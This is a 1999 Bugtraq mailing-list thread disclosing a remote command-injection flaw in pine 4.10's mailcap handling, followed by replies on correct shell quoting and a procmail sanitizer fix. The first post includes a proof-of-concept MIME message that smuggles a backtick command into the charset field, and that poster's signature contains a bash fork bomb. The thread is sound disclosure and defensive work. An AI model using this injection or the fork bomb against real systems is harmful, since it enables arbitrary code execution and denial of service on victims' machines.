Date: Mon, 8 Feb 1999 00:22:17 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@netspace.org
Subject: remote exploit on pine 4.10 - neverending story?

Affected systems:
-----------------

  Any Un*x system running 'pine' up to version 4.10 (latest).

Compromise:
-----------

  Remote execution of arbitrary code when message is viewed.

Details:
--------

  About five months ago, I reported vunerability in metamail package used
  with pine. I also noticed that '`' character is incorrectly expanded by
  pine. Problem has been ignored (probably noone understood what I am
  talking about?;-). But no matter. An exception from /etc/mailcap:

  text/plain; shownonascii iso-8859-1 %s; test=test "`echo %{charset} | tr
  '[A-Z]' '[a-z]'`" = iso-8859-1; copiousoutput

Impact:
-------

  And now, ladies and gentelmen - my old bug, reinvented. Usually, above
  mailcap line is expanded to:

  [...] execve </bin/sh> (sh) (-c) (test "`echo 'US-ASCII' | tr '[A-Z]'
        '[a-z]'`" = iso-8859-1)

  Hmm, but take a look at this message:

************************** MIME MESSAGE FOLLOWS **************************
>From: Attacker <attacker@eleet.net>
To: Victim <victim@somewhere.net>
Subject: Happy birthday
...
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset='US-ASCII'

Make a wish...

--8323328-235065145-918425607=:319
Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
Content-Transfer-Encoding: BASE64
Content-Description: wish
Content-Disposition: attachment; filename="wish.c"

...it could be your last.
*************************** MIME MESSAGE ENDS ***************************

 The result is:

  [...] execve </bin/sh> (sh) (-c) (test "`echo '``touch${IFS}ME``' | tr
        '[A-Z]' '[a-z]'`" = iso-8859-1)

  ...and arbitrary code ('touch ME', encoded using ${IFS} trick) is
  executed when message is viewed.

Fix:
----

  Well, it's the second time I report problems with ` in headers.
  Maybe pine developers should wait a little longer ;-)

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]

-------------------------------------------------------------------------

Date: Mon, 8 Feb 1999 18:13:53 +0100
From: Thomas Roessler <roessler@GUUG.DE>
To: BUGTRAQ@netspace.org
Subject: Re: remote exploit on pine 4.10 - neverending story?

This bug exhibits a general mailcap design problem, actually some
apparent lack of clarity in RFC 1524: The mailcap format
specification does not define where quoting takes place.  As a
result, users tend to do quoting manually using constructs like
"%..." or '%...'.  Software tends not to do _any_ quoting of its
own.

Why this means begging for desaster is obvious: Attackers can
construct strings with appropriate shell metacharacters to trick
users into executing arbitrary shell commands - just like Michael
demonstrated for this special case.

The only proper solution is that users MUST NOT perform any quoting
on their own in mailcap files, and that software MUST perform proper
shell quoting when expanding the %{something} strings.  "Proper
shell quoting" means to put the complete string into single quotes
and to replace any ' inside the string by the sequence of characters
'\''.  (Note that this is already in some Unix programming FAQ.)

"Simply" trying to escape or wipe out shell metacharacters will also
be a recipe for problems.  Think about certain bash versions'
handling of (as far as I recall) \xff as a word separator.

tlr
--
Thomas Roessler · 74a353cc0b19 · dg1ktr · http://home.pages.de/~roessler/
     2048/CE6AC6C1 · 4E 04 F0 BC 72 FF 14 23 44 85 D1 A1 3B B0 73 C1

-------------------------------------------------------------------------

Date: Mon, 8 Feb 1999 09:25:11 -0800
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: remote exploit on pine 4.10 - neverending story?


Okay, I have added `` -> " conversion to my procmail MIME sanitizer.

Michal, is that the only way to exploit this? Or should there be ` ->
' conversion as well?

See http://www.wolfenet.com/~jhardin/procmail-security.html for
details.

--
 John Hardin KA7OHZ                               jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin    PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  Your mouse has moved. Windows NT must be restarted for the change
  to take effect. Reboot now?  [ OK ]
-----------------------------------------------------------------------
   101 days until Star Wars episode I